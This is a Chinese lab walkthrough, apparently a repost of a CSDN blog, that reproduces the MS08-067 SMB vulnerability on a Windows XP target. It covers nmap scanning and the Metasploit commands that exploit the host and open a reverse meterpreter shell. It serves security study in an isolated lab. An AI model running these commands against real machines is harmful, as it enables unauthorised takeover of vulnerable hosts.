标签：067 show 端口 192.168 ms08 复现 MS08 靶机

原理

攻击者利用受害主机默认开放的SMB服务端口445，发送恶意资料到该端口，通过MSRPC接口调用server服务的一个函数，并破坏程序的栈缓冲区，获取远程代码执行的权限，从而完全控制主机

环境准备

攻击机kali 192.168.182.130
靶机 windows xp 中文版 192.168.182.129

靶机关闭防火墙，靶机需要在攻击机的网段中

端口扫描

使用nmap探测ip网段上存活的主机及开放的端口

nmap -sV -n 192.168.182.0/24

• -sV表示扫描系统版本及服务信息
• -n 表示加快扫描进度

查看是否存在ms08_067漏洞

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.182.129 --open

漏洞复现

启动msfconsole

msfconsole

搜索ms08_067选择攻击模块

search ms08_067

use调用模块

use exploit/windows/smb/ms08_067_netapi

show options 查看该模块需要配置的参数

show options

yes表示需要配置的参数，RPORT，SMBPIPE已经默认配置好了，只需要配置RHOSTS
配置RHOSTS，设置为靶机地址

set RHOSTS 192.168.182.129

msf6 Payload 攻击载荷模块已经默认设置好了不需要再设置lhost，LHOST表示回连地址,LPORT端口

设置target,靶机的系统版本

show targets

我的靶机是xp sp3 中文版
设置为target34 windows xp3 中文版

set target 34

run 运行即可反弹shell，反弹一个meterpreter代表攻击成功

run

标签：067,show,端口,192.168,ms08,复现,MS08,靶机
来源： https://blog.csdn.net/weixin_45291045/article/details/116834151

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。